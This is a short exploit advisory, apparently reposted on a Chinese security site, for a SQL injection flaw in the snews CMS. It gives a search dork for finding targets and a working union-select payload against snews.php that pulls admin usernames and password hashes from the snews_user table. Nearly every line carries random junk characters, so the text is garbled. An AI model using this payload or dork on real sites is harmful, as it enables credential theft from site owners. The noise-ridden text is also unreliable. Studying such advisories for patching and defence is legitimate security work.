标题: CMS snews SQL Injection Vulnerability+ ~0 Z4 g" \( h
作者: By onestree3 T0 z3 Z- z1 a( q* I( k7 ~% M
下载地址 : http://snewscms.com/4 I! N' }3 t9 F
测试平台 : ubuntu 12.10 / win 7
% s! |' A) Z c关键词: inurl:"tanyakan pada rumput yang bergoyang": e! Z1 M$ k. a! ?$ G
# R% _$ A; C3 V+ s4 }
" g) g: a4 N& W# g8 F*************************************************************% L' V& k* C# O( n! [
* r9 N+ |& N6 f6 W. G+ y
SQL poc:' K2 c8 Y) W6 @
6 K! B1 W& N/ y' O. ^, K2 ghttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]2 S; w5 ^# \: ?0 X
7 ]4 y- Q" R. |9 y示例+ P u/ M' w. c2 V8 O
) a M0 c! c9 c" B; k2 yhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
4 h/ |% K/ i4 {* C7 p2 x) [& w4 B4 m
: }; o: T2 Q1 a" }5 v& q# L" s. t # i( @) F+ D. y: E7 D# h9 Z1 O
致谢:. j$ V$ |3 _9 c* Z6 W# V
; q# a: g& ?: F1 N5 o* O Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
/ f- T1 ~5 |/ g& |: s n6 H
- u B( G& K! p$ ~0 C* K indonesiancoder - moeslimh4x0r - go-coder
5 r! u. r9 }4 M! D( n2 Y 3 i" _9 e" K/ g4 p/ p" c5 E) F* \
spesial my hunny :*
, T' c4 D, ~# x. M9 C' b |